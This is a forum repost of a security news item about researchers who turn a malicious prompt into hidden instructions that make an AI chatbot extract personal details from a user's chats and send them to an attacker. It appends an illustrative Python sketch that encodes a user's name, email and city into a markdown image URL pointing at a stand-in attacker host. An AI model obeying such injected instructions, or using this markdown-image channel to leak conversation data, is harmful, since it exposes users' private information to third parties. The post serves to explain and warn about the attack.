National Cyber Warfare Foundation (NCWF) Forums


This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats


2024-10-17 10:38:23
milo
Privacy
Security researchers have created an algorithm that turns a malicious prompt into a set of hidden instructions directing a chatbot to gather personal details from a user's chats and send them to an attacker.



Source: wiredsecurity
Source Link: https://www.wired.com/story/ai-imprompter-malware-llm/
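The post describes the attack only at a high level. As a rough illustration of the general exfiltration pattern such prompt-injection attacks rely on (not the researchers' actual algorithm), the sketch below shows how details pulled from a conversation could be smuggled out by folding them into a URL that the chat client fetches, for example as a rendered markdown image. The domain, field names, and helper function here are hypothetical and for illustration only.

```python
# Hypothetical sketch of the exfiltration pattern: a hidden instruction makes the
# model fold extracted personal details into a URL; when the chat client fetches
# that URL (e.g. to render an image), the data lands in the attacker's server logs.
# The endpoint and field names below are made up for illustration.
from urllib.parse import urlencode

ATTACKER_ENDPOINT = "https://attacker.example/collect"  # hypothetical attacker server


def build_exfil_markdown(extracted: dict) -> str:
    """Encode extracted chat details as query parameters on an image URL.

    Rendering the returned markdown triggers a request to the attacker's
    endpoint, carrying the personal data in the query string.
    """
    query = urlencode(extracted)
    return f"![ ]({ATTACKER_ENDPOINT}?{query})"


# Example: the kind of details a hidden instruction might tell the model to collect.
details = {"name": "Jane Doe", "email": "jane@example.com", "city": "Springfield"}
print(build_exfil_markdown(details))
# ![ ](https://attacker.example/collect?name=Jane+Doe&email=jane%40example.com&city=Springfield)
```

The point of the sketch is only the delivery channel: once the model has been tricked into emitting such a link, no further action by the user is needed beyond the client rendering it.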




